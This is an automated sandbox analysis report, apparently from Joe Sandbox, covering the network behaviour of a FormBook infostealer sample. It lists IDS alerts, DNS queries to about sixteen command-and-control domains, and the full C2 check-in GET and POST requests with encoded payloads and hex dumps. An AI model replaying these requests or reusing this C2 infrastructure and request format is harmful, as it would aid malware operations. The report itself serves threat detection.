            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49760 -> 212.227.172.253:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49762 -> 212.227.172.253:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49763 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49764 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49766 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49767 -> 69.57.162.24:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49768 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49769 -> 162.240.81.18:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.autonomyai.xyz
            Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
            Source: Joe Sandbox ViewIP Address: 69.57.162.24 69.57.162.24
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewASN Name: BEGET-ASRU BEGET-ASRU
            Source: Joe Sandbox ViewASN Name: EZIT-ASHU EZIT-ASHU
            Source: Joe Sandbox ViewASN Name: FORTRESSITXUS FORTRESSITXUS
            Source: Joe Sandbox ViewASN Name: GREENER-ASPL GREENER-ASPL
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00F725E2
            Source: global trafficHTTP traffic detected: GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /x98j/?FNPd=qjxZKFsELly6MM+AmuUyu+F9rQiXp5lDW0qCpVrbxnhhuort7QqFJtzXrMzOc4R6Q1I+kDBccd8ZIbwb2K8nQH4tZ93h2GRHyGwno8v69jYjSXEAvgOChTSVAihV0isdDVgpDYw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.upshercode.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.botcsllc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /q801/?FNPd=k3+C/Hz11l7GGMbtyaJwFwJpJMDKB1ezXvCBEwQvFs9JnbfCVR4CFb+wnQ6+1xhwjegmGkdUp41mNGCOeWSxR+T+a6juW6LhjpcRfEd8pWKsVNJFlAS3Jblwp/Y5eAdaUUcSoKM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.darkerberrycoffee.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /tqo3/?FNPd=2bWSXONhxyHzF1cu5s6B/sJ8pfZzXPi+J68LCWioeQMS7g2l/blqhOrYmnSOCV2cbofET6oXRpP0CSk36rK9vxO4l2MZCnk8VjQpuE2wrLwnvPBjOlEayeNaHsnz/3RL7InMz7Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.featurasandals.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /ii3e/?FNPd=gUffmmgf+j+eonfXGycQzt8ao2VHtB63wMQRmDLG69g3nf5Br3Vvevf8g6YjJ3DFTJ0p8mRaN1UTMPOwjNToF+SwMNbt6WzMyov1r5SS6GyZoHVOyxmtZVBap1MoFQhjNwOQqL8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.anoldshow.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /vucc/?FNPd=spJMClAwzf8Vr4tU/CNFMIwartImjnuX45nH0e+a/t8mnJgptjgbw3tj3ejIJ/FML5FH3w7kVV5/X9kg+3gEfjxhkZ7ZkTpqlYFj4xEsGEUQd8yZWQ8UdxmAeS1YmrNTPUkJX5Q=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.badcopsinyourtown.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /nvvv/?FNPd=JDodjlWkk0lcNcT9zM0S24FlsQS/eMqacQTVuCL7j+UnSXfTOV7xNk/UDiJqL4CQ9wwpEirhIcb8jwYA7Bo2HvZQNtTCLCENCF3b65oF2QxnolO6iVWtqwVopt5Qqv0FYMJ/2e8=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.autonomyai.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /xf32/?FNPd=C1mnXsnvmQ2srgCAP1LYR8UCiu5rr29LvVkLxlUVxlF6UozvjyxPjaNreXZ1i0YG7AgmeP0abVbXfNSSITNtMXyNs4HZedQg/L+kUEn9BLsW+ROjsB5HlVbKq/g7YxphTM4QsIM=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.brzuszkiewicz.plAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.novosti-dubai.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.ilodezu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.kubanci.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= HTTP/1.1Host: www.dvizhenie-pallet.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.szandraromanovics.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /2oa4/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZwnhHQRjdmYMWg8iT8fZssjRHm0dm/kqluwDPMT77mKIBha7fxwQW4MO+4PevzRBPSWs= HTTP/1.1Host: www.fruitique.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /klk7/?FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.isrninjas.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global trafficHTTP traffic detected: GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: cipher.exe, 00000004.00000002.4528764559.0000000008030000.00000004.00000800.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.0000000006068000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4526025642.0000000003508000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.emgeecontracting.shop
            Source: global trafficDNS traffic detected: DNS query: www.upshercode.store
            Source: global trafficDNS traffic detected: DNS query: www.botcsllc.com
            Source: global trafficDNS traffic detected: DNS query: www.darkerberrycoffee.com
            Source: global trafficDNS traffic detected: DNS query: www.featurasandals.com
            Source: global trafficDNS traffic detected: DNS query: www.anoldshow.top
            Source: global trafficDNS traffic detected: DNS query: www.badcopsinyourtown.info
            Source: global trafficDNS traffic detected: DNS query: www.autonomyai.xyz
            Source: global trafficDNS traffic detected: DNS query: www.brzuszkiewicz.pl
            Source: global trafficDNS traffic detected: DNS query: www.novosti-dubai.ru
            Source: global trafficDNS traffic detected: DNS query: www.ilodezu.com
            Source: global trafficDNS traffic detected: DNS query: www.kubanci.ru
            Source: global trafficDNS traffic detected: DNS query: www.dvizhenie-pallet.ru
            Source: global trafficDNS traffic detected: DNS query: www.szandraromanovics.hu
            Source: global trafficDNS traffic detected: DNS query: www.fruitique.co.uk
            Source: global trafficDNS traffic detected: DNS query: www.isrninjas.com
            Source: unknownHTTP traffic detected: POST /x98j/ HTTP/1.1Host: www.upshercode.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Length: 209Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.upshercode.storeReferer: http://www.upshercode.store/x98j/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoData Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 63 6e 43 69 64 73 53 6c 50 4e 31 68 46 6e 64 39 34 6f 57 59 54 71 34 78 58 2f 78 34 55 5a 43 6b 6f 2f 37 38 6d 72 33 49 6f 2b 56 73 63 6e 35 62 62 46 69 54 43 77 39 38 54 39 67 55 34 78 55 42 2b 45 37 79 71 4d 34 51 56 73 4a 4d 76 62 74 2b 30 45 35 79 6e 49 77 38 63 43 51 35 68 77 6f 63 6e 6b 61 39 53 53 41 6b 6a 6e 45 54 77 56 32 7a 52 77 4f 4d 47 67 57 41 63 73 35 51 33 74 6a 38 61 4d 2b 78 5a 6e 35 4c 6f 52 4a 78 67 41 6c 58 61 47 45 31 4d 59 34 62 56 71 4d 6e 53 72 49 43 46 41 34 57 72 33 34 67 72 6d 39 77 4b 42 44 6b 77 68 77 76 69 55 31 7a 4e 6e 4b 72 62 4b 42 Data Ascii: FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt+0E5ynIw8cCQ5hwocnka9SSAkjnETwV2zRwOMGgWAcs5Q3tj8aM+xZn5LoRJxgAlXaGE1MY4bVqMnSrICFA4Wr34grm9wKBDkwhwviU1zNnKrbKB
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:18:50 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 23 May 2024 13:19:06 GMTContent-Type: text/htmlContent-Length: 3650Connection: closeETag: "636d2d22-e42"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 